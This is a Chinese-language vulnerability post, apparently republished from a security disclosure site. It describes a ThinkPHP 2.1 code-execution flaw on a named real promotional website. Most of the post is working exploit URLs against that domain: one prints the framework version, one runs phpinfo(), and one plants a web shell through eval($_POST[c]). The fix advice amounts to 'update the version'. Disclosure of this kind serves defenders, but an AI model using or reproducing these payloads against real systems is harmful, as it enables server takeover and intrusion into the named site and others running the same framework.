好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

康师傅某站ThinkPHP 2.1 PHP任意代码执行 - 网站安全

这个站使用的是ThinkPHP 2.1,存在代码执行 漏洞 ,直接getshell 详细说明:就是康师傅红茶、绿茶以及其他各种茶瓶身上的那个活动 康师傅 - 玩转台湾 10000人大搜茶

http://www.ksftea.com/

系统使用Think PHP 2.1,<-ThinkPHP framework 任意代码执行漏洞预警->

http://zone.wooyun.org/content/44 查看版本:

http://www.ksftea.com/index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D

 

执行phpinfo(): http://www.ksftea.com/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D

可以构造shell地址:

http://www.ksftea.com/index.php/module/action/param1/$%7B@print(eval($_POST[c]))%7D www文件夹,好几个站

 

 

命令执行:

   

修复方案:

更新版本或者其他--!

查看更多关于康师傅某站ThinkPHP 2.1 PHP任意代码执行 - 网站安全的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did13532
  阅读:38次

上一篇: 音悦台一处存储型跨站 - 网站安全 - 自学php

下一篇:php168 V7整站系统注入漏洞 - 网站安全 - 自学php

相关资讯